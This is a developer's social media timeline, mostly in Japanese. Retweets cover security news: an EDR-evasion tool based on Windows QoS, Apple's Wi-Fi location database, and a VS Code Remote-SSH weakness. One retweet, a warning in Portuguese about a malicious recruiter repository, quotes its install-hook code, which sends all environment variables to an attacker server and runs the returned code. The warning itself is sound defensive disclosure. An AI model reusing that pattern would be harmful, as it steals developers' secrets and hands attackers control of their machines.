うさぎ、ハムスター クルマ が好きなソフトウェア開発者➡SE➡クラウドサービス開発へ 。絶賛勉強中。AIを使った効率的な開発にも興味あり。
Joined October 2010
- Tweets 7,510
- Following 985
- Followers 197
- Likes 9,582
1,150 Photos and videos
これはためしたい
が、文字コード問題がおきるPowerShellはこれでも避けたい気分はある。AIも文字化け扱いで困るんだよね
ASCII.jp:Windowsのコンソール上でUnix/Linuxの標準的なコマンドを動かす「Windows CoreUtils」 share.google/tbBx3XvaPYxQg0c…
12
これはしらなかったけど、相手を認識して動作を変えるのはいいね。セキュリティ的な活用はできないのかなぁ。
USB Type-Cのコールドソケットとは?挿すまで5Vを出さない“安全なUSB”の仕組みを解説 | VOLTECHNO share.google/BMndJo2BCniF8dC…
14
早く届かないかなぁ。待ち遠しいなぁ。
Jun 3
Shipping has begun! The Clicks team is working on fulfilling all pre-orders in chronological order. Please read our latest update here: discover.clicks.tech/power-k…
9
なるほどの理由。
こういった既存機能の活用を私も思いつきたい!!
肉眼では見えないQRコード。A4用紙に2TBのデータを保存 | ギズモード・ジャパン share.google/FPnNLYTwimwIPz2…
11
これいなぁ。
最近手に入れたD3400用に欲しいな
普段着に合わせやすいTTArtisanの“巾着カメラバッグ” - デジカメ Watch share.google/mCgwWDozKiMEP4c…
26
ワークショップは配信されない?!
見れないのは残念。。。
23
1UP retweeted
Jun 7
EDRを停止させずに“無力化”する新たな手法が公開された。Windows標準機能を利用して通信速度を極端に制限し、クラウド型EDRを管理サーバーから切り離すというもので、従来の検知を回避できる可能性があり、防御側にも監視強化が求められている。
セキュリティ研究者が公開したオープンソースツール「EDRChoker」は、WindowsのPolicy-Based QoS機能を利用してEDRエージェントの通信帯域をほぼゼロまで制限する。プロセス停止やコード注入を行わず、EDRとクラウド管理基盤との通信だけを妨害する点が特徴だ。
従来はWindows Defender FirewallやWindows Filtering Platform(WFP)を利用した遮断手法が主流だったが、これらはセキュリティ製品による検知対象になりやすかった。一方でEDRChokerは、より低いレイヤーで動作するQoS機能を利用することで、通常の通信遮断イベントを発生させずに接続障害を引き起こすという。
研究者は、この手法がクラウド接続に依存するEDR製品の設計上の弱点を浮き彫りにしたと指摘している。攻撃者がWindowsネットワークスタックのさらに深い層を悪用し始める中、防御側にもより低レベルの監視機能が求められている。
cybersecuritynews.com/edrcho…
105
410
27,222
1UP retweeted
May 27
/
エイプリルフールのネタから始まった
幻のキャンペーンを開催🌈
\
応募方法🔔
6/10(水)13:59までに
☑️当アカウントをフォロー
☑️本投稿をリポスト
抽選で合計101名様に豪華賞品をプレゼント✨
👜1名様にショルダーフォン型バッグ
🎁100名様に5,000円相当の楽天ポイント
※条件あり
詳細はリプライ欄をチェック✔️
みなさんの声から制作が始まった、世界で1つのオリジナルショルダーフォン型バッグです🫶
日頃の感謝を込めて、プレゼントキャンペーンにしました。
みなさんだったら、このバッグを持ってどこに行く?
リプライでぜひ、教えてください!
らくモは、推しのライブに行きます🩷
767
15,606
3,814
6,941,603
1UP retweeted
Jun 1
📢「GitHub After Dark」開催決定!
オフラインでGitHub Copilotユーザーが集まる特別な夜。最新デモに加え交流会などユーザー同士が繋がるプログラムが満載!
✓ 6月23日(火)18:00~
✓ THE UPPER(東京丸の内)
※お席に限りがあります、登録はお早めに
5
52
448
1,503,326
1UP retweeted
May 29
あなたの自宅Wi-Fiルーターは、あなたが何もしなくても、Appleの世界規模の位置情報データベースに登録されています。iPhoneを持っていなくても、関係ありません。
仕組みは単純です。あなたの自宅の近くをiPhoneが通ると、そのiPhoneは「このあたりにこのIDのWi-Fiルーターがある」という情報をAppleのサーバーに自動的に送信します。これが蓄積されることで、Appleは世界中のルーターの位置を記録した巨大なデータベースを構築しています。
このシステムはWPS(Wi-Fiポジショニングシステム)と呼ばれ、GPSを使わずに端末の位置を特定するための仕組みです。バッテリーを節約できるため、AppleもGoogleも同様の仕組みを運用しています。問題はAppleのAPIの設計にあります。
メリーランド大学のErik RyeとDave Levinの研究チームが2024年に明らかにしたことは、AppleのWPS APIが認証なし、アクセス制限なし、無料で誰でも使えるよう開放されていたという事実です。さらに1回の問い合わせに対して、最大400件もの周辺ルーターの位置情報を返す設計になっていました。
研究チームはこの仕組みを利用して、わずか1年間で世界中の20億件以上のルーターの位置情報を収集しました。特定の地域を絞り込んで継続監視することも可能で、ウクライナでは両軍が使用するStarlinkデバイスの位置と移動をリアルタイムで追跡できることを実証しています。ガザでは2023年10月7日以降、登録されているWi-Fiネットワーク数が75%減少し、その移動パターンが地図上で可視化されました。難民の動線が世界規模のデータベースに刻まれていたということです。
これは国家レベルの高度な攻撃者だけの話ではありません。誰でも無料で実行できる攻撃です。自宅に長期間設置されたルーターは追跡の対象になりえます。旅行用のモバイルルーターも例外ではありません。
Appleは研究チームからの指摘を受けて、いくつかの対応を取りました。Wi-FiのSSID(ネットワーク名)の末尾に「_nomap」という文字列を追加することで、データベースへの登録を拒否できる仕組みを2024年3月に案内しています。APIのクエリ返答数制限も2024年上半期中に実施されたと報告されています。
ただし、この対応方式には根本的な問題があります。「知っている人だけが除外できる」設計だからです。一般の利用者のほとんどは「_nomap」の存在を知りません。何もしなければ、引き続き登録された状態が続きます。Googleは同様のシステムをAPI認証あり・アクセス有料という設計で運用しており、設計の選択が異なります。
AppleはプライバシーをブランドのPRの中核に置いています。しかしこのシステムが長期にわたって認証もアクセス制限もなく開放されていた事実は、公式の説明では語られてきませんでした。研究者による公表によって初めて可視化された問題です。
自分のルーターをAppleのデータベースから外したい場合は、Wi-FiのSSID名の末尾に「_nomap」を追加してください。これはGoogleのWPSにも有効です。
技術的な便利さが、誰の同意も得ずに世界規模の監視インフラとして機能するとき、それを設計と呼ぶのか、それとも見落としと呼ぶのかは、利用者が判断する問いです。
5
35
97
8,476
1UP retweeted
May 29
Visual Studio Codeの「Remote-SSH」拡張機能に、侵害済み開発者端末からクラウドや本番環境へ横展開できる危険な問題が見つかった。MFAを導入していても防げない。
問題はRemote-SSH接続時の初期化処理にある。VS Codeは接続用シェルスクリプトをローカルの一時ディレクトリへ生成し、そのままリモートサーバーへ転送・実行する。しかしスクリプトの整合性検証や署名確認が行われておらず、攻撃者は生成直後に内容を書き換えられる。
開発者端末が既にマルウェア感染していた場合、攻撃者は改ざんしたスクリプトをAWS EC2、Azure VM、オンプレミスサーバーなど接続先で実行可能となる。認証後に発動するため、多要素認証(MFA)を回避する必要もない。
研究者はAzure、AWS、ローカルサーバー環境で攻撃成立を確認している。影響範囲はRemote-SSHを含む関連拡張機能全体で7,600万件以上のインストールに及ぶという。
Microsoftは報告を受けたものの、製品設計上の動作として扱っており修正予定は示していない。研究者は信頼できない端末でのRemote-SSH利用を避け、開発環境の分離や一時ディレクトリ監視を推奨している。
cybersecuritynews.com/vs-cod…
2
219
455
183,145
1UP retweeted
May 26
⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe.
Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar.
Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente.
🎯 Payload 1 — dispara no `npm install`
O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um:
`axios.post(url, { ...process.env })`
Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser.
A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.
31
324
1,117
677,898
1UP retweeted
May 26
GitHubで大規模障害が発生し、GitHub ActionsとGitHub Pagesが利用不能となった。認証エラーによりCI/CDパイプラインが停止し、世界中のソフトウェア配信へ影響が広がった。
障害は2026年5月26日10:57 UTC頃に始まり、Actions実行や依存関係取得に必要な認証処理が失敗。11:53 UTC時点でGitHubは「大半のActionsワークフローが影響を受けている」と公表した。
GitHub Actionsはトークンベース認証でジョブ実行やコード取得を行うため、認証基盤障害により新規ワークフロー開始、依存パッケージ取得、自動デプロイが停止した。GitHub Pagesでも性能低下が発生しており、プラットフォーム全体レベルの問題とみられている。
影響は個人開発者だけでなく、CI/CDやDevSecOpsをGitHubへ依存する企業にも及んだ。自動テストや脆弱性スキャン停止によるセキュリティ監視低下も懸念されている。
GitHubは「degraded availability」として調査継続中で、根本原因は未公表。ただし認証トークン検証や内部API認可系の障害が有力視されている。
cybersecuritynews.com/github…
173
458
64,738
ついに有料会員へ
快適ブラウジングだけでなく、任意のサイトブロックも可能。
ログ分析 画面もあるし、ブロック テンプレートも多数。とっても柔軟性 もあって助かります。スマホの DNS 設定を切り替えるだけで使えるのもよし(無駄なアプリインストール無しはいい)。
nextdns.io/
60
ClickHouse×AIもくもく会!リアルタイムDBで次世代AIアプリを作ろう に参加を申し込みました! clickhouse-japan.connpass.co… #ClickHouse
1
1
4
166
clipy-app.com/ Clipyを愛用してるけど、Clippy: Clipboard Manager for macOS github.com/yarasaa/Clippy も試してみたい。
名前が似すぎてるのがややこしいが
1
115
応募してみた。
分割している箇所のキーを左右で重複して保持しているところがちょっとおもしろい。
May 23
Merami Zero 試作品ができました!!
完全無線の分割ロープロファイルキーボードです。
普通の60%キーボードから移行しやすいように
・独立矢印キー
・分割スペースキー
・左右Y/H/B配置を採用しています。
購入意向アンケートと
↓↓↓先行試用モニター応募は返信欄へ↓↓↓
1
141